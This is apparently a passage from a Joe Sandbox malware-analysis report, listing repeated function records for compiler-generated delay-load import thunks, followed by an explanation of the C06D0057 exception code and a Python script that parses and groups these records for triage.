  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: c96016a7a075fd51f9387b47779bcfe08dc353fbfbeb79cddc7abb46ed9ad2c8
• Instruction ID: 9fef3e0a271d2c8ac7f8440605a219b37d41e3c3c4db79d62cce9726075079e3
• Opcode Fuzzy Hash: c96016a7a075fd51f9387b47779bcfe08dc353fbfbeb79cddc7abb46ed9ad2c8
• Instruction Fuzzy Hash: 9BB012D135A050AC314862053D02C3B02ADC1C2B21331C03EFC59C4080EB40AC201871
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 37eb46b0c502abe2eec0aa8dde3f78e00cb7c7b6c171d85ab2975c99e1723ead
• Instruction ID: ef793035072e99c0f259660c10f6a0956054740fd932fb320511fc4f60238d56
• Opcode Fuzzy Hash: 37eb46b0c502abe2eec0aa8dde3f78e00cb7c7b6c171d85ab2975c99e1723ead
• Instruction Fuzzy Hash: 59B012D136A050AC314862053D02C3B03EDC5C1B21331C03EF81AC4080EB406C201872
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 6b40051a7b25f4386b44eb71a5aaaa43687eb3c32b5f77f493cfc48d0dacf76f
• Instruction ID: 69a3a21af6d5ccdbfcca0af76b29131514a24895742de9bb2d192ca7e24dbbb7
• Opcode Fuzzy Hash: 6b40051a7b25f4386b44eb71a5aaaa43687eb3c32b5f77f493cfc48d0dacf76f
• Instruction Fuzzy Hash: 89B012D135D010AC314862153D02C3B02ECC1C2B21331C03EFC59C4080EB40AC201871
APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 8385f47747d0882ef938c92271f3b7712ce6dc12f9c7df1aeba220490ef24cb4
                                                                                                                                                                                                    • Instruction ID: 2f3608654b43099826550bf1f7810950aacf82be015fff5667d8dcd8954dea09
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8385f47747d0882ef938c92271f3b7712ce6dc12f9c7df1aeba220490ef24cb4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70B012E135D020AC314862053E02C3B02ECC1C1B21331C03EF819C4080EF416D211871
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 422a256fa542fe903ff9cc32f4c0a341c32fe23cff5fa8786db003ff3c1c8810
                                                                                                                                                                                                    • Instruction ID: c1baaa1ccbde5d9b287f2f60f02ce5f7b6998c54ab129cf055614ede0ef46c49
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 422a256fa542fe903ff9cc32f4c0a341c32fe23cff5fa8786db003ff3c1c8810
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1B012D1359010AC314862053D03C3B03ACC1C1B21331C43EF819C40C0EB406C201872
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: a7a0df0bc43905f977398c70b5e0f631ff9221fae905226d57be81dead5ba6f8
                                                                                                                                                                                                    • Instruction ID: 7ff466c80db9acce583abd2f3e8425a822174aad651a1f474d5b9d17bb255fcf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7a0df0bc43905f977398c70b5e0f631ff9221fae905226d57be81dead5ba6f8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7B012E125A0307D3148D1053E02C3702ACD1C1B21332C02EF558D11C0EB400C191473
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: e76a6702463b16c98110167a50bb8d33c78ab83457ae6a42a42473ce01eb5717
                                                                                                                                                                                                    • Instruction ID: 6d437ca1ccb1527069cd2ba59b211ee3d14a8a136d69bacce2df9cf500c554c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76a6702463b16c98110167a50bb8d33c78ab83457ae6a42a42473ce01eb5717
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21B012F125A020BD3148D1053D02C3702ACD1C2F21332C02EF898D1180EB404E101473
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E3FC
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: f044820820c4e45491b36465e40f2bb58fc51f1bc8cca855f1204c37000e72eb
                                                                                                                                                                                                    • Instruction ID: 4015d0a0ddc947f9f40f871b36c10014981d96ea2961f85b6976bd92ff89ea5e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f044820820c4e45491b36465e40f2bb58fc51f1bc8cca855f1204c37000e72eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98B012E125A020BD3148D1053D02C3702ACD1C1B21332C02EF898D11C0EB404C141473
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: dd111dfb49b6fec19cd5d6ecd369249df32dcfb9c4ac4a068598dc0cd4f1ba79
• Instruction ID: b42ecc44da70e7cd2b39e689deaf8f3bb83da24a2ffca93dc53fc8653fcd08c5
• Opcode Fuzzy Hash: dd111dfb49b6fec19cd5d6ecd369249df32dcfb9c4ac4a068598dc0cd4f1ba79
• Instruction Fuzzy Hash: 36B012C53690107C310811243D06C3B015CD1C2F10332C03EF468D4481BB404D141472
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: bd93f74c282a3f8a8d8d47c599e22c2537d7d16b46fd22cdda5793839216d7b7
• Instruction ID: 210925e468e6464355781d0609a1283f04c69cb27eb749448cae7e346f5a31f7
• Opcode Fuzzy Hash: bd93f74c282a3f8a8d8d47c599e22c2537d7d16b46fd22cdda5793839216d7b7
• Instruction Fuzzy Hash: 75B012C53A90107D314851083D02D3B01DCD1C2F10332C02EF41CC4180FB404C101472
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 390a76d9aaac3199df60c86e231cead87dda2cfcc2fcdd04339e221ddd6adfa1
• Instruction ID: 69a22c5a63e23e6c190ec60e21714ebb750fc29143add1e9cffb917ca522d9b0
• Opcode Fuzzy Hash: 390a76d9aaac3199df60c86e231cead87dda2cfcc2fcdd04339e221ddd6adfa1
• Instruction Fuzzy Hash: 31B012C53A90607C314851083E02C3B059CC1C2F10332C02EF41CC4180FB404C111471
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 8526839453bc8833cc8e4f1f57f15f12b77e51687f515b1e232789c032b14644
• Instruction ID: ddda3611f5271f43627993ac13c26be954482bf72d1fe8b3fac66762776cebdc
• Opcode Fuzzy Hash: 8526839453bc8833cc8e4f1f57f15f12b77e51687f515b1e232789c032b14644
• Instruction Fuzzy Hash: 12B012C53691107C324851087D03C3B019CC1C2F10332C22EF41CC4180FB404C541471
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 47b4910a8fe234c8683fe4cffdefc65830248a53d38c0c3b25aa01e1dd4ba0b2
• Instruction ID: c9084b7665e928d54f83bdf08405ee31b159c977bae02da503a01a1ad778ec78
• Opcode Fuzzy Hash: 47b4910a8fe234c8683fe4cffdefc65830248a53d38c0c3b25aa01e1dd4ba0b2
• Instruction Fuzzy Hash: 00B012C52EA0207D314C51543D02C3703DCC1C1B20333C02EF418C1180FB400C241472
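Every function record in this run of the report shares API String ID 1269201914-0 and calls nothing of its own except ___delayLoadHelper2@8; the DloadReleaseSectionWriteAccess and RaiseException(C06D0057, 00000000, 00000001, ?) calls sit inside the helper's subcall at 0012E85D. The exception code is an NTSTATUS-style value: severity 3 (error), facility 0x6D (the Visual C++ facility the MSVC delay-load helper uses for VcppException), Win32 error 0x57 = 87 = ERROR_INVALID_PARAMETER, which the helper raises when the delay-load descriptor it is handed is not in the format it supports. In other words these entries are linker-generated delay-load import thunks, and when ranking the many function records in this section by Instruction Fuzzy Hash or API profile they can be set aside in favour of functions with author-written logic. The script below is an added example, not Joe Sandbox code and not part of this report: it parses records laid out as above (SAMPLE copies two of them, link residue removed), groups them by API String ID, decodes any RaiseException code and flags pure delay-load thunks. The function names and the VcppException decoding table are assumptions taken from delayimp.h, not from the report.

```python
"""Parse the Joe Sandbox function records above and triage delay-load thunks.

Added example, not Joe Sandbox code: SAMPLE is copied from two records on this
page; the helper names and the VcppException table are this example's own.
"""
import re
from collections import defaultdict

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR: " for nested calls.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>[\w@?$]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")

# Assumption from delayimp.h / delayhlp.cpp, not from the report: the MSVC
# delay-load helper raises VcppException(ERROR_SEVERITY_ERROR, err), i.e.
# facility 0x6D with one of these Win32 error codes in the low 16 bits.
FACILITY_VISUALCPP = 0x6D
DELAYLOAD_ERRORS = {87: "ERROR_INVALID_PARAMETER", 126: "ERROR_MOD_NOT_FOUND",
                    127: "ERROR_PROC_NOT_FOUND"}

# Two records copied from this page (Memory Dump Source lines omitted).
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Instruction Fuzzy Hash: 36B012C53690107C310811243D06C3B015CD1C2F10332C03EF468D4481BB404D141472
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
  • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
  • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Instruction Fuzzy Hash: 00B012C52EA0207D314C51543D02C3703DCC1C1B20333C02EF418C1180FB400C241472
"""

def parse_records(text):
    """One dict per function; a record starts at each 'APIs' heading."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADINGS:
            if line == "APIs":
                current = {"apis": [], "similarity": {}}
                records.append(current)
            section = line
        elif current is not None and line.startswith("•"):
            item = line.lstrip("•").strip()
            if section == "APIs" and (m := API_RE.match(item)):
                current["apis"].append(m.groupdict())
            elif section == "Similarity":
                key, _, value = item.partition(":")
                current["similarity"][key.strip()] = value.strip()
    return records

def decode_vcpp_exception(code):
    """Split an NTSTATUS-style exception code into severity, facility and Win32 error."""
    win32 = code & 0xFFFF
    facility = (code >> 16) & 0x0FFF
    return {"severity": ("success", "informational", "warning", "error")[(code >> 30) & 3],
            "facility": facility, "win32_error": win32,
            "from_delayload_helper": facility == FACILITY_VISUALCPP,
            "name": DELAYLOAD_ERRORS.get(win32, "unknown")}

def raised_exceptions(record):
    """Decode the code argument of each RaiseException call, subcalls included."""
    return [decode_vcpp_exception(int(a["args"].split(",")[0], 16))
            for a in record["apis"] if a["name"] == "RaiseException" and a["args"]]

def is_delayload_thunk(record):
    """True when the function's own (non-subcall) API use is only the delay-load helper."""
    own = [a for a in record["apis"] if a["parent"] is None]
    return bool(own) and all(a["module"] == "DELAYIMP" and
                             a["name"].startswith("___delayLoadHelper2") for a in own)

def group_by_api_profile(records):
    """Bucket by Joe Sandbox's 'API String ID': one bucket per distinct API profile."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["similarity"].get("API String ID", "")].append(rec)
    return dict(groups)

if __name__ == "__main__":
    for profile, members in group_by_api_profile(parse_records(SAMPLE)).items():
        print(f"API profile {profile}: {len(members)} function(s)")
        for rec in members:
            verdict = "compiler delay-load thunk" if is_delayload_thunk(rec) else "review"
            codes = [e["name"] for e in raised_exceptions(rec)]
            print(f"  {rec['apis'][0]['ref']}: {verdict}; raises {codes}")
```

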